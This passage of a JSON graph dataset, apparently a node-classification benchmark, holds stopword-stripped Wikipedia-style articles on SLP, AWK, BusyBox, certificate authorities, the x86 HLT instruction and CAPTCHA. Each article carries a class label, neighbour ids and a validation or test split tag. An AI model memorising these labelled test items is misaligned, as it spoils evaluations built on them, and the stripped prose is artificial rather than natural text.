      559,
      4661,
      3639,
      7736,
      8760,
      62,
      7231,
      64,
      9281,
      4163,
      3657,
      5707,
      10831,
      11345,
      10834,
      6231,
      6747,
      8283,
      7264,
      10341,
      1642,
      9834,
      115,
      9843,
      4728,
      2169,
      3707,
      1664,
      1157,
      1683,
      1688,
      9884,
      3742,
      8351,
      10910,
      8358,
      7340,
      2736,
      9394,
      9908,
      11449,
      4797,
      9412,
      5834,
      11466,
      7885,
      4310,
      8923,
      3805,
      737,
      4326,
      8443,
      4863,
      3843,
      7943,
      1288,
      8468,
      7965,
      1834,
      10026,
      1836,
      11569,
      10057,
      2409,
      8557,
      6528,
      3971,
      11653,
      3462,
      8584,
      8080,
      7572,
      5026,
      11693,
      4048,
      6098,
      5078,
      5590,
      474,
      8674,
      7139,
      5605,
      487,
      8169,
      2027,
      494,
      1520,
      7152,
      5107,
      501,
      1526,
      503,
      5114,
      510
    ],
    "mask": "None"
  },
  {
    "node_id": 514,
    "label": 5,
    "text": "Service_Location_Protocol:service location protocol service location protocol slp srvloc service discovery protocol allows computers devices find services local area network without prior configuration slp designed scale small unmanaged networks large enterprise networks defined rfc 2608 rfc 3224 standards track document slp used devices announce services local network service must url used locate service additionally may unlimited number name/value pairs called attributes device must always one scopes scopes simple strings used group services comparable network neighborhood systems device see services different scopes url printer could look like url describes queue called myqueue printer host name myprinter protocol used printer lpr note special url scheme service used printer service urls required url scheme used allow search services type e.g printers regardless protocol use first three components service url type service printer lpr also called service type first two components service printer called abstract service type non- service url schema name service type instance http http //www.wikipedia.org attributes printer could look like example uses standard syntax attributes slp newlines added improve readability definition service url allowed attributes url specified service template formalized description url syntax attributes service templates defined rfc 2609 slp allows several query types locate services obtain information slp three different roles devices device also two three roles time today implementations daemons act ua sa usually configured become da well slp packet-oriented protocol packets transmitted using udp tcp also used transmission longer packets potential unreliability udp slp repeats multicasts several times increasing intervals answer received devices required listen port 427 udp packets sas das also listen tcp port multicasting used extensively slp especially devices join network need find devices operation slp differs considerably depending whether directory agent da network client first joins network multicasts query das network da answers assume network without das also possible add das later multicast 'heartbeat packet predefined interval received devices sa discovers da required register services da service disappears sa notify da unregister order send query network without da ua sends multicast udp packet contains query sas contain matches send udp answer ua answer large fit single udp packet packet marked overflown ua free send query directly sa using tcp transmit packets size order send query network da ua send query packet da using either udp tcp every sa must register services da da able fulfill request completely simply sends result back ua slp contains public-key cryptography based security mechanism allows signing service announcements practice rarely used",
    "neighbors": [
      7554,
      10242,
      9734,
      11413,
      3742,
      168,
      425,
      8360,
      10924,
      8238,
      2996,
      7863,
      576,
      7361,
      9665,
      7626,
      3791,
      11344,
      6993,
      4960,
      4457,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 515,
    "label": 9,
    "text": "AWK:awk awk domain-specific language designed text processing typically used data extraction reporting tool standard feature unix-like operating systems awk language data-driven scripting language consisting set actions taken streams textual data – either run directly files used part pipeline – purposes extracting transforming text producing formatted reports language extensively uses string datatype associative arrays arrays indexed key strings regular expressions awk limited intended application domain especially designed support one-liner programs language turing-complete even early bell labs users awk often wrote well-structured large awk programs awk created bell labs 1970s name derived surnames authors—alfred aho peter weinberger brian kernighan acronym pronounced name bird auk acts emblem language awk programming language book cover – book often referred abbreviation tapl written lowercase letters codice_1 refers unix plan 9 program runs scripts written awk programming language awk initially developed 1977 alfred aho author egrep peter j. weinberger worked tiny relational databases brian kernighan whose initials language takes name according kernighan one goals awk tool would easily manipulate numbers strings awk also inspired marc rochkind programming language used search patterns input data implemented using yacc one early tools appear version 7 unix awk added computational features unix pipeline besides bourne shell scripting language available standard unix environment one mandatory utilities single unix specification required linux standard base specification awk significantly revised expanded 1985–88 resulting gnu awk implementation written paul rubin jay fenlason richard stallman released 1988 gnu awk may widely deployed version included gnu-based linux packages gnu awk maintained solely arnold robbins since 1994 brian kernighan nawk new awk source first released 1993 unpublicized publicly since late 1990s many bsd systems use avoid gpl license awk preceded sed 1974 designed text processing share line-oriented data-driven paradigm particularly suited writing one-liner programs due implicit main loop current line variables power terseness early awk programs – notably powerful regular expression handling conciseness due implicit variables facilitate one-liners – together limitations awk time important inspirations perl language 1987 1990s perl became popular competing awk niche unix text-processing languages awk language processing text files file treated sequence records default line record line broken sequence fields think first word line first field second word second field awk program sequence pattern-action statements awk reads input line time line scanned pattern program pattern matches associated action executed alfred v. aho awk program series pattern action pairs written condition typically expression action series commands input split records default records separated newline characters input split lines program tests record conditions turn executes action expression true either condition action may omitted condition defaults matching every record default action print record pattern-action structure sed addition simple awk expression codice_2 codice_3 condition codice_4 codice_5 causing action executed records read pattern1 pattern2 matches range records starting record matches pattern1 including record matches pattern2 trying match pattern1 future lines addition normal arithmetic logical operators awk expressions include tilde operator codice_6 matches regular expression string handy syntactic sugar /regexp/ without using tilde operator matches current record syntax derives sed turn inherited ed editor codice_7 used searching syntax using slashes delimiters regular expressions subsequently adopted perl ecmascript quite common tilde operator also adopted perl seen wide use awk commands statements substituted action examples awk commands include function calls variable assignments calculations combination thereof awk contains built-in support many functions many provided various flavors awk also flavors support inclusion dynamically linked libraries also provide functions print command used output text output text always terminated predefined string called output record separator ors whose default value newline simplest form command although fields x may bear resemblance variables symbol indicates variables perl actually refer fields current record special case 0 refers entire record fact commands codice_8 codice_12 identical functionality print command also display results calculations and/or function calls output may sent file pipe awk built-in variables include field variables 1 2 3 0 represents entire record hold text values individual text-fields record variables include variable names use characters a-za-z0-9_ exception language keywords operators represent addition subtraction multiplication division respectively string concatenation simply place two variables string constants next optional use space string constants involved two variable names placed adjacent require space double quotes delimit string constants statements need end semicolons finally comments added programs using first character line format similar c function definitions consist keyword codice_21 function name argument names function body example function statement invoked follows functions variables local scope names added end argument list though values omitted calling function convention add whitespace argument list local variables indicate parameters end local variables begin customary hello world program written awk note explicit codice_22 statement needed since pattern codice_4 command-line arguments processed print lines longer 80 characters note default action print current line count words input print number lines words characters like wc pattern first line program every line input matches default increment actions executed every line note codice_24 shorthand codice_25 incremented numeric value nf last word line defined awk field separator default white-space nf number fields current line e.g 4 since 4 value fourth field nf value last field line regardless many fields line whether fewer fields surrounding lines actually unary operator highest operator precedence line fields nf 0 0 whole line case empty apart possible white-space numeric value 0 end input end pattern matches printed however since may lines input case value ever assigned default empty string adding zero variable awk idiom coercing string numeric value concatenating empty string coerce number string e.g note operator concatenate strings 're placed adjacently coercion program prints 0 empty input without empty line printed action statement prints line numbered printf function emulates standard c printf works similarly print command described pattern match however works follows nr number records typically lines input awk far read i.e current line number starting 1 first line input modulo operator nr 4 == 1 true 1st 5th 9th etc. lines input likewise nr 4 == 3 true 3rd 7th 11th etc. lines input range pattern false first part matches line 1 remains true including second part matches line 3 stays false first part matches line 5 thus program prints lines 1,2,3 skips line 4 5,6,7 line prints line number 6 character-wide field line contents example executed input previous program prints special case first part range pattern constantly true e.g 1 range start beginning input similarly second part constantly false e.g 0 range continue end input example prints lines input first line matching regular expression -- cut -- line containing phrase -- cut -- end word frequency using associative arrays begin block sets field separator sequence non-alphabetic characters note separators regular expressions get bare action performs action every input line case every field line add one number times word first converted lowercase appears finally end block print words frequencies line creates loop goes array words setting subscript array different languages loop goes value array loop thus prints word followed frequency count codice_26 addition one true awk see made book published program represented several ways first one uses bourne shell make shell script everything shortest methods codice_27 awk command protected single quotes shell expand variable needs put double quotes properly handle patterns containing spaces pattern usual way checks see whole line codice_28 matches codice_15 contains current filename awk explicit concatenation operator two adjacent strings concatenate codice_28 expands original unchanged input line alternate ways writing shell script accesses environment directly within awk shell script uses codice_31 array introduced newer version one true awk book published subscript codice_31 name environment variable result variable value like getenv function various standard libraries posix shell script makes environment variable codice_33 containing first argument drops argument awk look pattern file codice_6 checks see left operand matches right operand codice_35 inverse note regular expression string stored variables next way uses command-line variable assignment argument awk seen assignment variable use -v var=value command line option e.g awk -v pattern= pattern ... finally written pure awk without help shell without need know much implementation awk script variable assignment command line one bit lengthy codice_4 necessary extract first argument also prevent interpreted filename codice_4 block ends codice_38 number arguments always guaranteed ≥1 codice_39 name command executed script often string codice_40 also note codice_41 empty string codice_42 codice_43 initiates comment expands end line note codice_44 block awk checks see read standard input runs command means works fact filenames checked codice_45 run explicitly set codice_38 1 arguments awk simply quit feels input files therefore need explicitly say read standard input special filename codice_47 unix-like operating systems self-contained awk scripts constructed using shebang syntax example script prints content given file may built creating file named codice_48 following content invoked codice_49 codice_50 tells awk argument follows file read awk program flag used sed since often used one-liners programs default executing program given command-line argument rather separate file awk originally written 1977 distributed version 7 unix 1985 authors started expanding language significantly adding user-defined functions language described book awk programming language published 1988 implementation made available releases unix system v. avoid confusion incompatible older version version sometimes called new awk nawk implementation released free software license 1996 still maintained brian kernighan see external links old versions unix unix/32v included codice_51 converted awk c. kernighan wrote program turn awk c++ state known",
    "neighbors": [
      516,
      3076,
      9733,
      9735,
      6664,
      521,
      7196,
      2599,
      8236,
      5677,
      9780,
      8262,
      5706,
      3659,
      8306,
      10866,
      5759,
      9345,
      10881,
      3206,
      5256,
      1673,
      6281,
      6797,
      4750,
      2198,
      8854,
      6812,
      7847,
      4777,
      692,
      9915,
      7356,
      8385,
      10435,
      2245,
      9926,
      1741,
      10967,
      3802,
      9946,
      9444,
      5357,
      4850,
      10484,
      8954,
      3323,
      7435,
      8975,
      4369,
      5397,
      4398,
      7983,
      8499,
      823,
      1336,
      8504,
      8517,
      2374,
      9542,
      10569,
      8522,
      3413,
      9557,
      5992,
      11625,
      11632,
      5492,
      8057,
      3462,
      8582,
      3976,
      3468,
      11663,
      1952,
      4001,
      2995,
      451,
      1987,
      965,
      5588,
      4057,
      8675,
      10727,
      6120,
      491,
      5612,
      11249,
      5106,
      2035,
      8692,
      9204,
      506,
      6138,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 516,
    "label": 2,
    "text": "BusyBox:busybox busybox software suite provides several unix utilities single executable file runs variety posix environments linux android freebsd although many tools provides designed work interfaces provided linux kernel specifically created embedded operating systems limited resources authors dubbed swiss army knife embedded linux single executable replaces basic functions 300 common commands released free software terms gnu general public license version 2 originally written bruce perens 1995 declared complete intended usage 1996 busybox originally aimed put complete bootable system single floppy disk would serve rescue disk installer debian distribution since time extended become de facto standard core user space toolset embedded linux devices linux distribution installers since linux executable requires several kilobytes overhead busybox program combine two hundred programs together often saves substantial disk space system memory busybox maintained enrique zanardi focused needs debian boot-floppies installer system early 1998 dave cinege took linux router project lrp cinege made several additions created modularized build environment shifted busybox focus general high-level embedded systems lrp development slowed 1999 erik andersen lineo inc. took project became official maintainer december 1999 march 2006 time linux embedded marketplace exploded growth busybox matured greatly expanding user base functionality rob landley became maintainer 2005 late 2006 denys vlasenko took current maintainer september 2006 heavy discussions controversies project maintainer rob landley bruce perens busybox project decided adopting gnu public license version 3 gplv3 busybox license clarified gpl version 2 gplv2 late 2007 busybox also came prominence actively prosecuting violations terms license gpl u.s. district court southern district new york claimed first us lawsuit gpl violation concerned use busybox embedded device lawsuit case 07-cv-8205 united states district court southern district new york filed september 20 2007 software freedom law center sflc behalf andersen landley monsoon multimedia inc. busybox code discovered firmware upgrade attempts contact company apparently failed case settled release monsoon version source payment undisclosed amount money andersen landley november 21 2007 sflc brought two similar lawsuits behalf andersen landley two companies xterasys case 07-cv-10455 high-gain antennas case 07-cv-10456 xterasys case settled december 17 release source code used undisclosed payment high-gain antennas case march 6 2008 active license compliance undisclosed payment december 7 2007 case brought verizon communications distribution firmware actiontec routers case settled march 17 2008 condition license compliance appointment officer oversee future compliance free software licenses payment undisclosed sum suits brought june 9 2008 bell microproducts case 08-cv-5270 supermicro case 08-cv-5269 super micro case settled july 23 2008 busybox bell microproducts also settled court october 17 december 14 2009 new lawsuit filed naming fourteen defendants including best buy jvc samsung others february 2010 samsung released ln52a650 tv firmware gplv2 used later reference samygo community project august 3 2010 busybox westinghouse default judgement triple damages 90,000 lawyers costs fees 47,865 possession presumably lot high-def tvs infringing equipment lawsuit software freedom conservancy v. best buy et al. gpl infringement case noted paragraph developers including original author bruce perens maintainer dave cinege represented actions party settlements december 15 2009 perens released statement expressing unhappiness aspects legal situation particular alleged current busybox developers appear removed copyright statements busybox developers appear altered license statements busybox customized provide subset two hundred utilities provide utilities specified single unix specification sus plus many others user would expect see linux system busybox uses almquist shell also known shell ash sh complete bootstrap system replace init daemon udev latter-day systemd using called init startup mdev hotplug time busybox web site provides full list utilities implemented typical computer programs separate binary executable file application busybox single binary conglomerate many applications accessed calling single busybox binary various names supported symbolic link hard link different name specific manner appropriate arguments busybox benefits single binary approach reduces overhead introduced executable file format typically elf allows code shared multiple applications without requiring library technique similar provided crunchgen command freebsd difference busybox provides simplified versions utilities example ls command without file sorting ability crunchgen generated sum utilities would offer fully functional versions sharing common code along routines written size-optimization mind make busybox system use much less storage space system built corresponding full versions utilities replaced busybox research compared gnu busybox asmutils perl implementations standard unix commands showed situations busybox may perform faster implementations always official busybox documentation lists overview available commands command-line options programs included busybox run simply adding name argument busybox executable commonly desired command names linked using hard symbolic links busybox executable busybox reads argv 0 find name called runs appropriate command example /bin/ls linked /bin/busybox works first argument passed program name used program call case argument would /bin/ls busybox would see name ls act like ls program busybox used several operating systems running embedded systems essential component distributions openwrt openembedded including yocto project buildroot sharp zaurus utilizes busybox extensively ordinary unix-like tasks performed system shell necessary several root applications android also preinstalled 1 tap root solutions kingo root toybox started early 2006 gnu general public license former busybox maintainer rob landley result controversies around gplv3/gplv2 discussions end 2011 re-licensed bsd license project went dormant january 11 2012 tim bird sony employee suggested creating alternative busybox would gnu general public license suggested based dormant toybox january 2012 proposal creating bsd licensed alternative gpl licensed busybox project drew harsh criticism matthew garrett taking away relevant tool copyright enforcement software freedom conservancy group starter busybox based lawsuits rob landley responded intentional came conclusion lawsuits resulted hoped positive outcomes wanted stop whatever way see fit",
    "neighbors": [
      8576,
      6273,
      515,
      4611,
      4995,
      5637,
      3079,
      7812,
      6281,
      8326,
      8582,
      9735,
      4367,
      4369,
      5397,
      2198,
      9366,
      154,
      3744,
      10016,
      3618,
      7975,
      10921,
      7082,
      428,
      2605,
      3886,
      7983,
      9646,
      1844,
      823,
      8248,
      1849,
      7356,
      8256,
      321,
      451,
      9540,
      8262,
      3911,
      8268,
      4561,
      5969,
      11603,
      4309,
      10967,
      9689,
      477,
      4957,
      6238,
      3581,
      2786,
      6371,
      4964,
      8675,
      8676,
      6120,
      11112,
      7920,
      11249,
      3314,
      2804,
      8692,
      1782,
      5110,
      2809,
      2811,
      2045,
      5759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 517,
    "label": 4,
    "text": "Certificate_authority:certificate authority cryptography certificate authority certification authority ca entity issues digital certificates digital certificate certifies ownership public key named subject certificate allows others relying parties rely upon signatures assertions made private key corresponds certified public key ca acts trusted third party—trusted subject owner certificate party relying upon certificate format certificates specified x.509 standard one particularly common use certificate authorities sign certificates used https secure browsing protocol world wide web another common use issuing identity cards national governments use electronically signing documents trusted certificates used create secure connections server via internet certificate essential order circumvent malicious party happens route target server acts target scenario commonly referred man-in-the-middle attack client uses ca certificate authenticate ca signature server certificate part authorizations launching secure connection usually client software—for example browsers—include set trusted ca certificates makes sense many users need trust client software malicious compromised client skip security check still fool users believing otherwise clients ca server supervisors call certificate servers bestow users commercial cas charge issue certificates customers anticipate ca certificate contained within majority web browsers safe connections certified servers work efficiently out-of-the-box quantity internet browsers devices applications trust particular certificate authority referred ubiquity mozilla non-profit business issues several commercial ca certificates products mozilla developed policy ca/browser forum developed similar guidelines ca trust single ca certificate may shared among multiple cas resellers root ca certificate may base issue multiple intermediate ca certificates varying validation requirements addition commercial cas non-profits issue digital certificates public without charge notable examples cacert let encrypt large organizations government bodies may pkis public key infrastructure containing cas site using self-signed certificates acts ca browsers clients sorts characteristically allow users add away ca certificates server certificates regularly last relatively short period ca certificates extended repeatedly visited servers less error-prone importing trusting ca issued rather confirm security exemption time server certificate renewed less often trustworthy certificates used encrypting signing messages cas dispense end-user certificates used s/mime however encryption entails receiver public key since authors receivers encrypted messages apparently know one another usefulness trusted third party remains confined signature verification messages sent public mailing lists worldwide certificate authority business fragmented national regional providers dominating home market many uses digital certificates legally binding digital signatures linked local law regulations accreditation schemes certificate authorities however market globally trusted tls/ssl server certificates largely held small number multinational companies market significant barriers entry due technical requirements legally required new providers may choose undergo annual security audits webtrust certificate authorities north america etsi europe included trusted root web browser operating system 180 root certificates trusted mozilla firefox web browser representing approximately eighty organizations 200 root certificates trusted macos android 4.2 jelly bean android currently contains 100 cas updated release november 18 2014 group companies nonprofit organizations including electronic frontier foundation mozilla cisco akamai announced let encrypt nonprofit certificate authority provides free domain validated x.509 certificates well software enable installation maintenance certificates let encrypt operated newly formed internet security research group california nonprofit recognized tax-exempt section 501 c 3 according netcraft may 2015 industry standard monitoring active tls certificates states although global tls ecosystem competitive dominated handful major cas — three certificate authorities symantec comodo godaddy account three-quarters issued tls certificates public-facing web servers top spot held symantec verisign purchased symantec ever since survey began currently accounting third certificates illustrate effect differing methodologies amongst million busiest sites symantec issued 44 valid trusted certificates use — significantly overall market share w3techs survey may 2015 shows w3techs survey november 2017 shows w3techs survey may 2018 shows identrust cross-signer let encrypt intermediates risen popular ssl certificate authority symantec dropped chart due security services acquired digicert commercial cas issue bulk certificates https servers typically use technique called domain validation authenticate recipient certificate techniques used domain validation vary cas general domain validation techniques meant prove certificate applicant controls given domain name information applicant identity many certificate authorities also offer extended validation ev certificates rigorous alternative domain validated certificates extended validation intended verify control domain name additional identity information included certificate browsers display additional identity information green box url bar one limitation ev solution weaknesses domain validation attackers could still obtain domain validated certificate victim domain deploy attack occurred difference observable victim user would absence green bar company name question whether users would likely recognise absence indicative attack progress test using internet explorer 7 2009 showed absence ie7 ev warnings noticed users however microsoft current browser edge shows significantly greater difference ev domain validated certificates domain validated certificates hollow grey lock domain validation suffers certain structural security limitations particular always vulnerable attacks allow adversary observe domain validation probes cas send include attacks dns tcp bgp protocols lack cryptographic protections tls/ssl compromise routers attacks possible either network near ca near victim domain one common domain validation techniques involves sending email containing authentication token link email address likely administratively responsible domain could technical contact email address listed domain whois entry administrative email like admin administrator webmaster hostmaster postmaster domain certificate authorities may accept confirmation using root info support domain theory behind domain validation legitimate owner domain would able read emails sent administrative addresses domain validation implementations sometimes source security vulnerabilities one instance security researchers showed attackers could obtain certificates webmail sites ca willing use email address like ssladmin domain.com domain.com webmail systems reserved ssladmin username prevent attackers registering prior 2011 standard list email addresses could used domain validation clear email administrators addresses needed reserved first version ca/browser forum baseline requirements adopted november 2011 specified list addresses allowed mail hosts reserve addresses administrative use though precautions still universal january 2015 finnish man registered username hostmaster finnish version microsoft live able obtain domain-validated certificate live.fi despite owner domain name ca issues digital certificates contain public key identity owner matching private key made available publicly kept secret end user generated key pair certificate also confirmation validation ca public key contained certificate belongs person organization server entity noted certificate ca obligation schemes verify applicant credentials users relying parties trust information ca certificates cas use variety standards tests essence certificate authority responsible saying yes person say ca certify user trusts ca verify ca signature also assume certain public key indeed belong whoever identified certificate public-key cryptography used encrypt data communicated two parties typically happen user logs site implements http secure protocol example let us suppose user logs bank homepage www.bank.example online banking user opens www.bank.example homepage receive public key along data web-browser displays public key could used encrypt data client server safe procedure use protocol determines temporary shared symmetric encryption key messages key exchange protocol enciphered bank public key way bank server private key read rest communication proceeds using new disposable symmetric key user enters information bank page submits page sends information back bank data user entered page encrypted web browser therefore even someone access encrypted data communicated user www.bank.example eavesdropper read decipher mechanism safe user sure bank see web browser user types www.bank.example communication hijacked fake website pretends bank website sends page information back user browser fake web-page send fake public key user fake site owns matching private key user fill form personal data submit page fake web-page get access user data certificate authority mechanism intended prevent certificate authority ca organization stores public keys owners every party communication trusts organization knows public key user web browser receives public key www.bank.example also receives digital signature key information so-called x.509 certificate browser already possesses public key ca consequently verify signature trust certificate public key since www.bank.example uses public key certification authority certifies fake www.bank.example use public key since fake www.bank.example know corresponding private key create signature needed verify authenticity difficult assure correctness match data entity data presented ca perhaps electronic network credentials person/company/program asking certificate likewise presented commercial cas often use combination authentication techniques including leveraging government bureaus payment infrastructure third parties databases services custom heuristics enterprise systems local forms authentication kerberos used obtain certificate turn used external relying parties notaries required cases personally know party whose signature notarized higher standard reached many cas according american bar association outline online transaction management primary points us federal state statutes enacted regarding digital signatures prevent conflicting overly burdensome local regulation establish electronic writings satisfy traditional requirements associated paper documents us e-sign statute suggested ueta code help ensure despite security measures undertaken correctly verify identities people companies risk single ca issuing bogus certificate imposter also possible register individuals companies similar names may lead confusion minimize hazard certificate transparency initiative proposes auditing certificates public unforgeable log could help prevention phishing large-scale deployments alice may familiar bob certificate authority perhaps different ca server bob certificate may also include ca public key signed different ca presumably recognizable alice process typically leads hierarchy mesh cas ca certificates authority revocation list arl form certificate revocation list crl containing certificates issued certificate authorities contrary crls contain revoked end-entity certificates ca/browser forum publishes baseline requirements list policies technical requirements cas follow requirement inclusion certificate stores firefox safari ca subverted security entire system lost potentially subverting entities trust compromised ca example suppose attacker eve manages get ca issue certificate claims represent alice certificate would publicly state represents alice might include information alice information alice employer name might true increasing certificate credibility eve however would all-important private key associated certificate eve could use certificate send digitally signed email bob tricking bob believing email alice bob might even respond encrypted email believing could read alice eve actually able decrypt using private key notable case ca subversion like occurred 2001 certificate authority verisign issued two certificates person claiming represent microsoft certificates name microsoft corporation could used spoof someone believing updates microsoft software came microsoft actually fraud detected early 2001 microsoft verisign took steps limit impact problem 2011 fraudulent certificates obtained comodo diginotar allegedly iranian hackers evidence fraudulent diginotar certificates used man-in-the-middle attack iran 2012 became known trustwave issued subordinate root certificate used transparent traffic management man-in-the-middle effectively permitted enterprise sniff ssl internal network traffic using subordinate certificate attacker steals certificate authority private keys able forge certificates ca without needed ongoing access ca systems key theft therefore one main risks certificate authorities defend publicly trusted cas almost always store keys hardware security module hsm allows sign certificates key generally prevent extraction key physical software controls cas typically take precaution keeping key long-term root certificates hsm kept offline except needed sign shorter-lived intermediate certificates intermediate certificates stored online hsm day-to-day work signing end-entity certificates keeping revocation information date cas sometimes use key ceremony generating signing keys order ensure keys tampered copied critical weakness way current x.509 scheme implemented ca trusted particular party issue certificates domain choose certificates accepted valid trusting party whether legitimate authorized serious shortcoming given commonly encountered technology employing x.509 trusted third parties https protocol major web browsers distributed end-users pre-configured list trusted cas numbers dozens means one pre-approved trusted cas issue valid certificate domain whatsoever industry response muted given contents browser pre-configured trusted ca list determined independently party distributing causing installed browser application really nothing cas issue driving impetus behind development dns-based authentication named entities dane protocol adopted conjunction domain name system security extensions dnssec dane greatly reduce completely eliminate role trusted third parties domain pki various software available operate certificate authority generally software required sign certificates maintain revocation information operate ocsp crl services examples",
    "neighbors": [
      513,
      7683,
      517,
      9221,
      8204,
      9744,
      1046,
      3097,
      2083,
      5674,
      6708,
      7736,
      7231,
      9281,
      3657,
      10831,
      11345,
      3161,
      8283,
      7264,
      10341,
      1650,
      2169,
      3707,
      11387,
      10882,
      5764,
      1157,
      1683,
      1688,
      156,
      9884,
      3742,
      160,
      8865,
      2214,
      8358,
      2734,
      10417,
      6834,
      9394,
      2228,
      4793,
      3264,
      9412,
      5834,
      5327,
      7893,
      3805,
      4326,
      4863,
      11520,
      1288,
      1297,
      7965,
      11048,
      6954,
      1836,
      10033,
      11569,
      11584,
      9548,
      5465,
      8029,
      9569,
      361,
      2416,
      2932,
      4471,
      9085,
      11653,
      6028,
      8080,
      928,
      929,
      419,
      7075,
      8615,
      11693,
      6098,
      2003,
      5590,
      1496,
      474,
      9690,
      8674,
      7139,
      3562,
      2027,
      8170,
      2034,
      5107,
      501,
      1526,
      503,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 518,
    "label": 3,
    "text": "HLT_(x86_instruction):hlt x86 instruction x86 computer architecture codice_1 halt assembly language instruction halts central processing unit cpu next external interrupt fired interrupts signals sent hardware devices cpu alerting event occurred react example hardware timers send interrupts cpu regular intervals codice_1 instruction executed operating system immediate work done system enters idle state windows nt example instruction run system idle process x86 processors opcode codice_1 codice_4 x86 processors 8086 onwards codice_1 instruction used ms-dos prior 6.0 specifically designed reduce power consumption release intel dx4 processor 1994 ms-dos 6.0 provided power.exe could installed config.sys microsoft tests saved 5 first 100 mhz dx chips buggy hlt state prompting developers linux implement no-hlt option use running chips changed later chips almost every modern processor instruction set includes instruction sleep mode halts processor work needs done interrupt-driven processors instruction halts cpu external interrupt received architectures executing instruction allows processor significantly reduce power usage heat output commonly used instead busy waiting sleeping idling since issuing codice_1 instruction requires ring 0 access run privileged system software kernel often best practice application programming use application programming interface api provided purpose operating system work done referred yielding processor allows operating system scheduler decide processes runnable normally issue hlt instruction cut power usage",
    "neighbors": [
      8976,
      10786,
      4270,
      7983,
      823,
      6596,
      9932,
      9166,
      5457,
      3027,
      10067,
      10966,
      602,
      477,
      1776,
      5744,
      499,
      372,
      1915
    ],
    "mask": "Validation"
  },
  {
    "node_id": 519,
    "label": 4,
    "text": "CAPTCHA:captcha captcha acronym completely automated public turing test tell computers humans apart type challenge–response test used computing determine whether user human term coined 2003 luis von ahn manuel blum nicholas j. hopper john langford common type captcha displayed version 1.0 first invented 1997 two groups working parallel form captcha requires user type letters distorted image sometimes addition obscured sequence letters digits appears screen test administered computer contrast standard turing test administered human captcha sometimes described reverse turing test user identification procedure received many criticisms especially people disabilities also people feel everyday work slowed distorted words difficult read takes average person approximately 10 seconds solve typical captcha since early days internet users wanted make text illegible computers first people hackers posting sensitive topics internet forums thought automatically monitored keywords circumvent get pass filters replaced word look-alike characters hello could become well numerous variants filter could possibly detect later became known leetspeak one earliest commercial uses captchas gausebeck–levchin test 2000 idrive.com began protect signup page captcha prepared file patent seemingly novel technique 2001 paypal used tests part fraud prevention strategy asked humans retype distorted text programs difficulty recognizing paypal cofounder cto max levchin helped commercialize early use popular deployment captcha technology recaptcha acquired google 2009 addition preventing bot fraud users google used recaptcha captcha technology digitize archives new york times books google books 2011 two teams claimed first invent captchas used widely web today first team mark d. lillibridge martín abadi krishna bharat andrei broder used captchas 1997 altavista prevent bots adding uniform resource locator urls web search engine looking way make images resistant optical character recognition ocr attack team looked manual brother scanner recommendations improving ocr results similar typefaces plain backgrounds etc. team created puzzles attempting simulate manual claimed would cause bad ocr second team claim first invent captchas luis von ahn manuel blum nicholas j. hopper john langford first described captchas 2003 publication subsequently received much coverage popular press notion captcha covers program distinguish humans computers controversy inventorship resolved existence 1997 priority date patent application eran reshef gili raanan eilon solan second group worked sanctum application security firewall patent application details invention based applying human advantage applying sensory cognitive skills solving simple problems prove extremely hard computer software skills include limited processing sensory information identification objects letters within noisy graphical environment lillibridge abadi bharat broder first group published patent 1998 patents predate publications several years though use term captcha describe ideas detail precisely depict graphical captchas used web today captchas definition fully automated requiring little human maintenance intervention administer producing benefits cost reliability algorithm used create captcha must made public though may covered patent done demonstrate breaking requires solution difficult problem field artificial intelligence ai rather discovery secret algorithm could obtained reverse engineering means modern text-based captchas designed require simultaneous use three separate abilities—invariant recognition segmentation parsing—to correctly complete task consistency problems poses significant challenge computer even isolation presence three time makes captchas difficult solve unlike computers humans excel type task segmentation recognition two separate processes necessary understanding image computer part process person example individual understands first letter captcha individual also understands contours also melds contours next letter additionally human brain capable dynamic thinking based upon context able keep multiple explanations alive pick one best explanation whole input based upon contextual clues also means fooled variations letters used mostly security reasons captchas also serve benchmark task artificial intelligence technologies according article ahn blum langford program passes tests generated captcha used solve hard unsolved ai problem argue advantages using hard ai problems means security twofold either problem goes unsolved remains reliable method distinguishing humans computers problem solved difficult ai problem resolved along case image text based captchas ai capable accurately completing task without exploiting flaws particular captcha design would solved problem developing ai capable complex object recognition scenes captchas based reading text — visual-perception tasks — prevent blind visually impaired users accessing protected resource however captchas visual hard artificial intelligence problem speech recognition used basis captcha implementations captchas permit users opt audio captcha though 2011 paper demonstrated technique defeating popular schemes time non-sighted users example blind users color blind people color-using test visual captchas present serious problems captchas designed unreadable machines common assistive technology tools screen readers interpret since sites may use captchas part initial registration process even every login challenge completely block access certain jurisdictions site owners could become targets litigation using captchas discriminate certain people disabilities example captcha may make site incompatible section 508 united states cases sight difficulties choose identify word read providing audio captcha allows blind users read text still hinders blind deaf according sense.org.uk 4 people 60 uk vision hearing impairments 23,000 people uk serious vision hearing impairments according national technical assistance consortium children young adults deaf-blind ntac number deafblind children usa increased 9,516 10,471 period 2004 2012 gallaudet university quotes 1980 2007 estimates suggest upwards 35,000 fully deafblind adults usa deafblind population estimates depend heavily degree impairment used definition use captcha thus excludes small number individuals using significant subsets common web-based services paypal gmail orkut yahoo many forum weblog systems etc even perfectly sighted individuals new generations graphical captchas designed overcome sophisticated recognition software hard impossible read method improving captcha ease work proposed protectwebform called smart captcha developers advise combine captcha javascript support since hard spam robots parse execute javascript using simple script fills captcha fields hides image field human eyes proposed one alternative method involves displaying user simple mathematical equation requiring user enter solution verification although much easier defeat using software suitable scenarios graphical imagery appropriate provide much higher level accessibility blind users image-based captchas sometimes referred maptchas mathematical however may difficult users cognitive disorder kinds challenges require understanding meaning text e.g. logic puzzle trivia question instructions create password also used captcha little research resistance countermeasures approaches defeating captchas using cheap human labor recognize exploiting bugs implementation allow attacker completely bypass captcha finally using machine learning build automated solver according former google click fraud czar shuman ghosemajumder numerous services solve captchas automatically earliest iterations systematic methodology designing evaluating captchas result many instances captchas fixed length therefore automated tasks could constructed successfully make educated guesses segmentation take place early captchas contained limited sets words made test much easier game still others made mistake relying heavily background confusion image case algorithms created successfully able complete task exploiting design flaws methods proved brittle however slight changes captcha easily able thwart modern captchas like recaptcha longer rely fixed patterns instead present variations characters often collapsed together making segmentation almost impossible newest iterations much successful warding automated tasks october 2013 artificial intelligence company vicarious claimed developed generic captcha-solving algorithm able solve modern captchas character recognition rates 90 however luis von ahn pioneer early captcha founder recaptcha expressed skepticism stating hard impressed since see every months pointed 50 similar claims vicarious made since 2003 